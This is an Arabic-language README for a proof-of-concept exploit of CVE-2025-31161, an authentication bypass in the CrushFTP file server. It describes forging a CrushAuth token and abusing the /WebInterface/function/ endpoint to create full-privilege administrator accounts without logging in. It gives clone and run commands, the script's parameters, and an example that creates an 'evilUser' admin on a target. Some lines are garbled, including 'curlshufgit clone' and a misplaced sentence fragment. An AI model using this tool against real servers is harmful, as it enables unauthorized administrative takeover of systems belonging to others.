
PoC CVE-2025-31161 - تجاوز المصادقة CrushFTP
PoC CVE-2025-31161 - تجاوز المصادقة في CrushFTP
CrushAuth صالح وإنشاء مستخدم إداري بصلاحيات كاملة.يستهدف هذا الاستغلال ثغرة حرجة في CrushFTP، مما يسمح للمهاجمين عن بُعد غير المصادق عليهم بتجاوز المصادقة وإنشاء مستخدمين إداريين عشوائيين.
يعمل عن طريق صياغة رمز CrushAuth ذي مظهر صالح وإساءة استخدام نقطة النهاية /WebInterface/function/ لإرسال حمولة XML مكتملة التكوين.
curlshufgit clone https://github.com/f4dee-backup/CVE-2025-31161
cd CVE-2025-31161
chmod +x CVE-2025-31161.sh
./CVE-2025-31161.sh --help
[?] Parameters description:
--url Target base URL (e.g., http://target)
--port Port where CrushFTP is running
--target-user Valid or invalid username (e.g., crushadmin)
--new-user Username to be created (e.g., Pwn3d)
--new-password Password for the new user
--help Show this help panel
[i] Example: ./CVE-2025-31161.sh --url http://target.com --port 80 --target-user crushadmin --new-user evilUser --new-password pass12345